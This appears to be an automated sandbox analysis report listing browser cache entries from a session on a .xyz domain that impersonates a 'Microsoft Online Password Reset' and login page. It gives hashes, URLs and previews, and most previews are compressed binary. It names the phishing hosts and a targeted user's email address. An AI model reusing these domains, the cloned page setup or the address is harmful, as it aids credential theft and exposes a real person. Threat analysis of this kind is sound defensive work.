                                          Preview:...........}Ms#G.....u...z |..#h........C)$....`/.n...p..8...;.j.|..G_|.O.........n..How...!..+++++3+3.w7k..{..R.=.......~....E.......O. ......7.U.Q..?~v.Y.w..;....*._...N...e.zpb'.....7k....|.a...((-...J........,.}~.c2.'p<..eu.................9n#,.......7.\?...^6...^.3..^.h.....R(.^..p...xY...c..D..l2..'#o.W..7iB...XL..S.(.B......i.D.M\p..`..Eg{.....7M..{...zh...'N]..L...s..2.A..u..."*p.. Xx....w..'l..w..'c/^.FP....q.h4.R+X^{...d..M.C.J,..RP.7E.T......8 .v....Iw.X..?.r......nk./..?Wj..A.|./........JAs.j......?.!..t.z.-..m.]..3y...S@...'.).).Aa..1.kQ.....l+.....-q..n.p../..l.H>G.^<.}..ID.][D..[!...........{O....9.C...8V>..=N..(.4.KXt../.1U...\F.*0..=.......p.-..kQ@P..(...-..ea&>.y.......:..Y.t[x..Xw:.QTp....ZE.u..\?`q......EhJ.A.L.......P..=.xk....(.wrL.."d.q`...$../.\...M.<_|.<.~|[....l....o...;p.(z.&.,~.....X....1?e1.1..v.L.........,.......?{...\fB....-.).Fb.;.p.N...n(..^....B.#D...g|.E..8R\.0....7 ...C....QQ.fPB3."F..dN....%.s..%....'

                                          Chrome Cache Entry: 134

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 113355
                                          Category:downloaded
                                          Size (bytes):20390
                                          Entropy (8bit):7.979439840390925
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:02363E4C20BE02F305298C569681427C
                                          SHA1:EEEF3294F36805907EC217BE82022A71350AA7F5
                                          SHA-256:DE0591B9220B931A57F173CE64D7E14F041B979CA5BEC6127B4BCEC7C373AD1C
                                          SHA-512:7AD5AB34536709F0AA0C7FEDABF6432A6EB2F5D201BC71AA34E236E230D9FDF7C01EAE3A1800DE9F9AF01521B881478F259BE1574755C4FC17B8090E237BE9DA
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/ests/2.1/content/cdnbundles/converged.v2.login.min_mc5ac6ol0l4d2iaqspstyg2.css
                                          Preview:...........}ks.6.....\.R;.J.H=-WR;..&>g^53.G.R[.DY<C..$e.WG..... )...{+'g...l............bw_f7.:x..<x.-.*V5)/wE..Y...gy.0.*(.*-o.e.|..._..I.....?<{.!x...W..._..^..p..E..'..Y...<.....*]..6(. ..D..*...Y.......:.ve.?..!..|t...].+.......a.......|.P...u.H.d.d.r.c[..~.L..n.-.}e.H3...r..^..iP.u.*.z.....)..Z.jx..C'......u..{.C...N.o.m~..F(b..f.....h..O.....6....kr.......n2m M$.R..R..i{.~...*..n.dKY..#.Kn.4..G...O..l.#.a=..iU..].S.2.wY..O.|...Z.A....].uU.._%U.<...pp..u=.....C.R..S.....0...A<......&...W..'o.T.."..jO..^+.....DiW.b..7i..7..........lKe.0.~B0.....zQu#...YB.,.{*.&.6..G.6..._...J.i.?.LS$( .^.{..u.-.0....K....M&j..s.yB..+....^.)...7e.....]..eFI_.kRX.B......D[.4......+.u=>....R.`QEK...R..d...*S.. ,c5RKBK(......][..eF{T.....6...".....Uk:..S.0Ro.}B.dwJZ}U..S.F.....&.&.~|......{..Ep.>x..._....}p..=.}...v...7?}...g..1&.......}...^...o.x.>x...../.^....._.........w.v./.........BA...{J..w..$?.}w....?zO.r..5...7.gl..z...g.?.{....R.......yGj

                                          Chrome Cache Entry: 137

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):23063
                                          Entropy (8bit):4.7535440881548165
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:90EA7274F19755002360945D54C2A0D7
                                          SHA1:647B5D8BF7D119A2C97895363A07A0C6EB8CD284
                                          SHA-256:40732E9DCFA704CF615E4691BB07AECFD1CC5E063220A46E4A7FF6560C77F5DB
                                          SHA-512:7474667800FF52A0031029CC338F81E1586F237EB07A49183008C8EC44A8F67B37E5E896573F089A50283DF96A1C8F185E53D667741331B647894532669E2C07
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/WebResource.axd?d=PZp-UguzV3eiIgC9jthUzRVid1Zp7Yrh6GnWr6UFT7HZeGKMaINHyYeiOoYl901XG1SgokATq5Nqn3NEpiSXniqMwkj7V_kjzBmM_w8PfSJW9srpOcEZZbp1FPwrN8XzdR0AFY0bHhANU64v3ZJk5Q2&t=638533173304620628
                                          Preview:function WebForm_PostBackOptions(eventTarget, eventArgument, validation, validationGroup, actionUrl, trackFocus, clientSubmit) {.. this.eventTarget = eventTarget;.. this.eventArgument = eventArgument;.. this.validation = validation;.. this.validationGroup = validationGroup;.. this.actionUrl = actionUrl;.. this.trackFocus = trackFocus;.. this.clientSubmit = clientSubmit;..}..function WebForm_DoPostBackWithOptions(options) {.. var validationResult = true;.. if (options.validation) {.. if (typeof(Page_ClientValidate) == 'function') {.. validationResult = Page_ClientValidate(options.validationGroup);.. }.. }.. if (validationResult) {.. if ((typeof(options.actionUrl) != "undefined") && (options.actionUrl != null) && (options.actionUrl.length > 0)) {.. theForm.action = options.actionUrl;.. }.. if (options.trackFocus) {.. var lastFocus = theForm.elements["__LASTFOCUS"];.. if ((typeo

                                          Chrome Cache Entry: 138

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (941), with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):51996
                                          Entropy (8bit):4.678808903961564
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:F95520B36E5DCF0FCC3A202EF755B4E6
                                          SHA1:BD76BCEF3046599348372DF0C0882CEC7097999E
                                          SHA-256:60792654629471644E38A1D7DA760E9736CFCD6AB0AC9E99EA0801D8A467328B
                                          SHA-512:48EECFD4C51F4095BD87E15108CA968EFF484906075148D4C985512F8B4BD8FDA6A5DA80C9A4F5D0BF7C10B497F421DBF2178E8D96C66906487808F099B05846
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?ru=https%3a%2f%2fonline.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz%2fcommon%2freprocess%3fctx%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASYnjUkdz1qcmpUS4jSD905fRWjMmEj9C8wMr5gZJzEJJmbmpOfkulQnJxfUqKbmpOaXFKUmQxScotJ0L8o3TMlvNgtNSW1KLEkMz_vETNu9RdYBF6x8BgwW3FwcAkwSDAoMPxgYVzECnThp24vduH1ot57E6O9TDsmMZxi1Q91yjGISI7IDjP3MClMz_I1jczONAuyCDb3yPKqckvRjvL3DsqKjEoJKfa0NbEynMAmNIGN6RQbwwc2lg52hlnsDAc4GQ_wMvzgO3avY9W-G8veebzi13H28bUoDC4v9U4NztA39wvOSDIId_U2TTJJ9oyyyAv1KAzLSQ4OdK8ILHO03SDA8ECAAQA1&mkt=en-US&hosted=0&device_platform=Windows+10&username=melodi%40scott-electric.com
                                          Preview:..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">..<head><title>...Microsoft Online Password Reset..</title><meta http-equiv="x-ua-compatible" content="IE=9" /><meta http-equiv="Expires" content="0" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Cache-Control" content="no-store, no-cache" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="robots" content="noindex, nofollow, NOODP, NOYDIR" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link id="FavoriteIcon" rel="Shortcut Icon" type="image/x-icon" href="favicon.ico?v=1342177280" />.... <script src="//2ac4b5bb-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/ajax/jQuery/jquery-3.6.0.min.js" type="text/javascript"></script>.. <script type="text/javascript">window.jQuery || document.write('<script type="text/javascript

                                          Chrome Cache Entry: 140

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 7042
                                          Category:downloaded
                                          Size (bytes):2445
                                          Entropy (8bit):7.923098628075793
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:37AED21D2C2C95A2F4586765375A96AB
                                          SHA1:CE7470E279718C15C35C29E504FA409D0D1B0E8A
                                          SHA-256:A19BFF0BF413D5902773E2936994EE130DCA83F6DDA0CE04012420C202590BE8
                                          SHA-512:A74F38ED2D579EDB2799A3E90B99C1E82608B890E47C4C0B72287D339CFA4076AA05C05E86C5A91DB7A26868A8275D7BD24EC846450482F66EC8EBE9499DCDD7
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/shared/1.0/content/js/asyncchunk/convergedlogin_pidpdisambiguation_9bde48b6fee57b337cea.js
                                          Preview:...........Xms.6..._..36.P.d.U..qe.q/.}...M..$(."...%....-.".......4c.......Y,............7@W.h..w....?..jp.={..eT...*.OC...`A<.b.8...x.8.D...s.C.s.!...pvK\)PH..I.....{..s9C.....h.#..l.%3..$....A8.2m!<..4..G....L]...%..%t.FD..U.&. A$...A..J..*23.E......B?[(...R.\LRX....pf-91W.....$C3.../.C....E"......./u.UY. |.\.C.@..,XB...]..".....yi...G.......l.3C4J..le&"B.$!..m.|J..J. t+X.c....4[...^..2.W....4.#*.."q...h...s|..9..d.sg....X${.u7...t.b..s.~..[..~+r...pv.u..E..;.....$.L..$.....d.:.<...R.j..4..pS.$....AL..c.._..V..@...u...k.;~..jY:5........c}.01\..)..2L...azp.5..XXX1...k.....K.o.0....<.g........Hs..W.".qi.E:....B.).ZK9........ifdS+.)?...}x..HB<...1..L..G<..._xh..k&$..G.t....'..]8lNa<.."...s...R..N...d......W~.1....;.......h....KAU...)....%$7{pe wUL]r..^..).npJ...:ZDq..A.vbA.#.o....S.gy.-....+.#.3..cSK!.1.O3..\.|.]tY.....y1._.AL-d..a@c....\.....aT.....c...K.t...[,....Yk...U..*...[[...a..Nr...z...\W./.4.[....E..#U.`.!.....q..N.\.z....F.c..<>...b2..

                                          Chrome Cache Entry: 141

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):1525
                                          Entropy (8bit):4.80220321270831
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:ACA0F1B02DC406E76DDC5F2BDEBEC6CE
                                          SHA1:594C930BE86B8843377565E349D2A10F1755A13A
                                          SHA-256:0446C6FD9AEB7DCD7CC089FA25323B1AE9AFA77B4CF8D4449F7D2D1B2467393A
                                          SHA-512:06887860F73D38799FFF8BF5B2972160B68C303EC904813861190E9A8A6477E4D300882994D661FDFC118C408625C537D8B28287DC9941D50302BD91C88ED98F
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/js/Common.js
                                          Preview:.....function GetCookieValue(cookieName)..{.. if (document.cookie == undefined || document.cookie == "").. return "";.... var name = cookieName + "=";.. var cookieArray = document.cookie.split(';');.. for (var i = 0; i < cookieArray.length; i++).. {.. var clientCookie = cookieArray[i].trim();.. if (clientCookie.indexOf(name) == 0).. {.. return clientCookie.substring(name.length, clientCookie.length);.. }.. }.. return "";..}....function DeleteCookie(name)..{.. if (GetCookieValue(name).length > 0).. {.. document.cookie = name + "=" + ";expires=Thu, 01 Jan 2000 00:00:01 GMT";.. }..}....function GetUserSessionData(key) {.. var sessionStorage = window.sessionStorage;.. if (sessionStorage[key] == null) {.. return "";.. }.. return sessionStorage.getItem(key);..}....function SetUserSessionData(key, value) {.. var sessionStorage = window.sessionStorage;.. sessionStorage.setItem(key, val

                                          Chrome Cache Entry: 145

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 16 x 25, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):405
                                          Entropy (8bit):6.927238031773719
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:D4FFE61373F6AA32EEB8CA7CD41AB980
                                          SHA1:4925FAC4BC73EFB7C7BBC32B11C435ECF1D61674
                                          SHA-256:D5C54FFC6B8BD44D932BE8F37B1CD5B666205C7574F9D56EF68E56F83E08FFAD
                                          SHA-512:0F7EDE96F20BB3C053C246FFE1EF8CE739CEF7757FAAED031A365299B88664A046557C2C7FDB3BADED070BA4EBA1A14950D7E3A066B4976BF07142CEFA48BEEB
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.PNG........IHDR.............8.......sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.Adobe ImageReadyq.e<....IDAT8O...0...nf..y.,X4.g.I.h4..H.`.b.bA..f.n....%.=.iS.?N....^....A.(...~.i..m[.Qyz..iB..(...8...<G.........y..$.8....EQ.u]..I..(R.l...a...=..?t...CUU.......-..7.!..@.u0\..y.@..[a...p@.J.......e..>.Y..i..>A...+.,[. X9..z....B.4..+)..`n/..Q..>...y....e<....IEND.B`.

                                          Chrome Cache Entry: 147

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, original size modulo 2^32 513
                                          Category:dropped
                                          Size (bytes):276
                                          Entropy (8bit):7.319344972980597
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:44D8807C223B5C6DEF6E75A602F314EF
                                          SHA1:E061C196D771661D6C47336C50EAFE2B3BA14130
                                          SHA-256:BA9816D7AF3E3B0EA5B6B34BAA0C99FE5EDCF4CA9BE30307AAA2956F994A8B1E
                                          SHA-512:E71B16643B2AC3DC315D1EEF21B9054A71F35E9E2E1DC0D36ABC08F4BDF1A9D3C3D6E9D35D06217966647367DCDD7709EA92B558CE407422FC13B4C33E12E3E4
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....

                                          Chrome Cache Entry: 148

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, original size modulo 2^32 1864
                                          Category:dropped
                                          Size (bytes):673
                                          Entropy (8bit):7.6584200238076905
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2D2CBA7D7DC75F3BA9DC756738D41A6E
                                          SHA1:F87FD26066ED5E52A65DEE0ED2D581D3C3EA15AC
                                          SHA-256:00E21864CF1BC70302EBB5B496C6C471A7DA8CBF600630B478A3E2376ED20EA2
                                          SHA-512:46F17658CA247C02F612213025350390D8F62179C8DE26725EB17F5CCFAFDD63F2149DA1765D3C2F3A12FE85EF29CAC58457B0D5C2F8DA8DED6E1231A35F199D
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

                                          Chrome Cache Entry: 149

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 102845
                                          Category:downloaded
                                          Size (bytes):25653
                                          Entropy (8bit):7.988599483516265
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:F0CE56431957B4C65471B640FFB5EE36
                                          SHA1:13CD0BC4A060FCDBDF12E60FFE3CDFAFC9A31367
                                          SHA-256:9224E3CC201F01A5C9F2BD82F4653897BCE931ECF4DD74B5A0134D7EC6C0BD73
                                          SHA-512:96AD01A07C31DA43830A3B9D4EA9908B1C72D84209513EEFBE6E6907406E8FFC071098D095739447BBFF12A63851C91301640F8DEBFB352E2FD17AF63513FAA2
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/ScriptResource.axd?d=QLrP6mIJ7ueSGHO76v9yfTImQUOtYCoOjHacorzH5TLKOrh9q9RxJn4yT2gwt-5hCto2xKcJLNcreE4qet4Lh8rEpzV0U1CdXTgP1HQS6sdYdfc3vDJz_AHQWhudWnHugQouXXFhySP7eLg7L_3MN7WQWeyz2NjjwVkoZ_qPHIuVWaKEoOm3CQ7ncbyZM4_YTXDCK8GCLjftpLcukJlboowfkGtZtJ8Ej00GYvDVARg1&t=74258c30
                                          Preview:............v.9.(.>k.?P9..YLQ.\WRi.l.]..m...5..+o$S".,&iK%........'"pG"I..s.Z].l'q...@ ....................O...,....S..2OfEY..>...h...v.d4jP..1..l.)K.X.+...\E7......b.P..?.o..h...H.zZv2..2....JMfY4.F.Q.%.a..7. ..f.|1.4d...).5.0....l2/.l2..{y..=..4<....Y..$a...e.......RU....<...o&nG...9..e..+..@.Xj.Vv.O.Q6..U. v..j&.d_...x:...B3.e6..i...*~.Fy..y..`...T..@G....N.i0.... ..!<..0.3...r.tP...a.-&i..'Y......v.i...9X.O.m...ws...X...Vb~....@.............|...HO......~{....~{*Z?..[....s.........^6*....Ivw..a..0.......A?.n1.Ae..hT.w..... .r....0.8...J_.G..FL.".....H.i....%....)..F....M.ooE..~Bkx%P...f....\i.J`.6<(..B...B.........4..........&....A...h.Q......<.d...~....(...)a..>.^AS.x....... .....S..)..F......B.6y.K.4.../B..Xq;.....D..n3[.w.>....6..O.%/MaR.D.W*.h.&.........r\.-\g)..-...".f.=$.._.C..|...5...dOH.C_k...].Q0...B3.{k.6.*d...2N.f.....K..b..i.....8.y~.4.?.^.WY2o.2....k7....EG.I{:+..6.#..].A.\..R..O...;;.\Bz.......9O..%...;.........k.w

                                          Chrome Cache Entry: 150

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (941), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):51996
                                          Entropy (8bit):4.679826725884972
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:CF944604631F649ED9E95FCDD0D4460C
                                          SHA1:C5AF5FD0582628A6E2D926AF6D3D2516FB44B31C
                                          SHA-256:C8833A023341DAAC282DAF8C40850730D02EF836677E72387DF15D8133618691
                                          SHA-512:B57D8F7F3BC8E5AAB75B750B9093C01876D3506C3229B0AB2F604FADB8BDFFB3959FACE32E3C066D6037C0AB518E19AEE764CD7A05DAD1C29146F0D614F2669F
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">..<head><title>...Microsoft Online Password Reset..</title><meta http-equiv="x-ua-compatible" content="IE=9" /><meta http-equiv="Expires" content="0" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Cache-Control" content="no-store, no-cache" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="robots" content="noindex, nofollow, NOODP, NOYDIR" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link id="FavoriteIcon" rel="Shortcut Icon" type="image/x-icon" href="favicon.ico?v=1342177280" />.... <script src="//2ac4b5bb-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/ajax/jQuery/jquery-3.6.0.min.js" type="text/javascript"></script>.. <script type="text/javascript">window.jQuery || document.write('<script type="text/javascript

                                          Chrome Cache Entry: 151

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, original size modulo 2^32 3651
                                          Category:downloaded
                                          Size (bytes):1435
                                          Entropy (8bit):7.860223690068481
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:DF6A7721C242813411CC6950DF40F9B3
                                          SHA1:B2068C4A65C183AAD6FC22A44CC1FA449CD355B4
                                          SHA-256:AA53B6DC744357B392FC57C34E516BAE465D4A6837775C137A176D599C8EA948
                                          SHA-512:CDCFB686649F2061FE13A58841EB6A4E17F40951BA0C440C568B248E6128B6E0C4E79F95DC3EAB81286C103ED2A966F7058D22066466ADED482BF9ECAA6EA3CB
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                          Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

                                          Chrome Cache Entry: 152

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):3005
                                          Entropy (8bit):4.3348196756520005
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:A870B45AC5D6B0D4E18C4829C7B660B4
                                          SHA1:2D3CA0E1F19EFDEB9B2DD3DCFFB17F8ABA118AA0
                                          SHA-256:144524233F795D6A425B76F7AE5C0BB622B5F67E2E6AE73532AD526528CA07CF
                                          SHA-512:295A21307D452F4BF51C62770C6A6B43CDB8B5A6BFA3617E068C8550285252B88F8BBF93A81C39E4BD7F73645EE094EDE0E2733DAFA5094E3EBAE20033363270
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/WebResource.axd?d=YNhUFlNXinz8LgHwbL24RQH-ZbXxyvcr7OOnguhxng8ZuiFTPNJ9QXh8dtoptfX3BeFWG9A9Hk63eLbtbIxk0HvJhkP2FoYJavizwe94hutTawufYPfHJsHAawGlkTxEe6yX2kZBiYdQxI60gLHN2g2&t=638533173304620628
                                          Preview:function WebForm_FindFirstFocusableChild(control) {.. if (!control || !(control.tagName)) {.. return null;.. }.. var tagName = control.tagName.toLowerCase();.. if (tagName == "undefined") {.. return null;.. }.. var children = control.childNodes;.. if (children) {.. for (var i = 0; i < children.length; i++) {.. try {.. if (WebForm_CanFocus(children[i])) {.. return children[i];.. }.. else {.. var focused = WebForm_FindFirstFocusableChild(children[i]);.. if (WebForm_CanFocus(focused)) {.. return focused;.. }.. }.. } catch (e) {.. }.. }.. }.. return null;..}..function WebForm_AutoFocus(focusId) {.. var targetControl;.. if (__nonMSDOMBrowser) {.. targetControl = document.getElementById(focusId);.. }.. else {.. targetContro

                                          Chrome Cache Entry: 153

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 26702
                                          Category:downloaded
                                          Size (bytes):7429
                                          Entropy (8bit):7.96949164523104
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:C69C9AC59264518D6B3E827DD93802A4
                                          SHA1:4B3AAB159045680EC9315A4930BEEB3DCEF6640B
                                          SHA-256:3C43CE6BD3C3EA0EE1BD1340F7D462CB7BFCE6D6E483D5F00C29A98AFD0A3A0F
                                          SHA-512:80540A3E5B4311036DD37611B040FFF4B1CD8868D75CCADF50613E8C885F676FE7395CF80B54EA665AE6A8D0024D74B5AE381F46510AC1BBDB72B59A0AA5192B
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/shared/1.0/content/js/asyncchunk/convergedlogin_ppassword_4d39c0367444c533fcd7.js
                                          Preview:...........=kw.6...W..=....;...e}...8..R.m.....$.....e......o......{.zj. 0..{. ........m.......vq..N..GZ..~../.........`.'......#'...B....,.X.p.h3...N..c6...jQ.>Q.'Z.'...h.....bO.91_j.a.|......h.EK.=.Z..R..=.-..0..<.h.-..;.^.n..6.ZL]._.$...S....P..Y...S.c..j"..3&.; ..{.p,...a.>C..9,..0X.%$r`.o...3m..)..z.p...f.....p..7w.YYfB.kD1.4..cM.+A.5z.A.$Xj......t.8g.S:.!'@<*....?....2...(...V._..531.O......M....bk.....!oM9.......9K>y..O.O..~.}^....8.M...$z.7...{l>...V.^...../.>%..$....#@R;b3..3tze.u+..e....e..@}.....}....=....C..nAG..^..D.lE..................>.....e..............m...v....3.8...94{..A\.......d..w.sBy7L...4C.....9.1H..~4....a.k......0n....b......mc.Q.JWFF.g.y..M.vl..To..>..d.Mg..^3...\.......2XF..B.q..8f1..yJ...o;....4..|_.f7#.v.SI..F...Q3.....%\......8.[...\.C..Qr....D..<..N.\B......(...M.}.."'I. ..1[@{/.`8.r...k...Q@q..r..A3..].K.x.....{5K..N0....5.!h......=..J.X{B......r....C..l.]... ...$.....L......#.....G`.yr..vM....e@.%...X<a...`

                                          Chrome Cache Entry: 154

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (941), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):51657
                                          Entropy (8bit):4.654575632629266
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:E702E060D1824A9B42C0E9C596A72868
                                          SHA1:868AE017816094810089D436108993A9004D6493
                                          SHA-256:F641BB21C51BB8B911BB4CF713A6733351C20E4FF6C21032CDC93921E535972C
                                          SHA-512:9B76E3A91545E4D123D7DEB405FB7BE3EC31D61502A023DCF3A69E058804AD205F86C47F92223E794E908C9A03528FCFB75F4EACA63886C008C9D179965B238D
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">..<head><title>...Microsoft Online Password Reset..</title><meta http-equiv="x-ua-compatible" content="IE=9" /><meta http-equiv="Expires" content="0" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Cache-Control" content="no-store, no-cache" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="robots" content="noindex, nofollow, NOODP, NOYDIR" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link id="FavoriteIcon" rel="Shortcut Icon" type="image/x-icon" href="../favicon.ico?v=1342177280" />.... <script src="//2ac4b5bb-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/ajax/jQuery/jquery-3.6.0.min.js" type="text/javascript"></script>.. <script type="text/javascript">window.jQuery || document.write('<script type="text/javascr

                                          Chrome Cache Entry: 155

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:GIF image data, version 89a, 22 x 22
                                          Category:downloaded
                                          Size (bytes):478
                                          Entropy (8bit):7.072122642964318
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:309B41EE7A44BD51E5D1B52CCC620E5B
                                          SHA1:B162CE55DE01BF7C005F8CE4D4D7C32E7AEACA08
                                          SHA-256:F213507641FD02EC43981535823474ECFDE973D1B33A6CD385F1F0827FD4B528
                                          SHA-512:9279138126F8FEDD3AEF32BA4BCD78D3D26BBD4E7DE6F3B21014B96C34D7E69BC4C6471CC94772346CB6C7F9020EB5FE1A3A96686A5B250F5CCDEE54A0936F4D
                                          Malicious:false
                                          Reputation:unknown
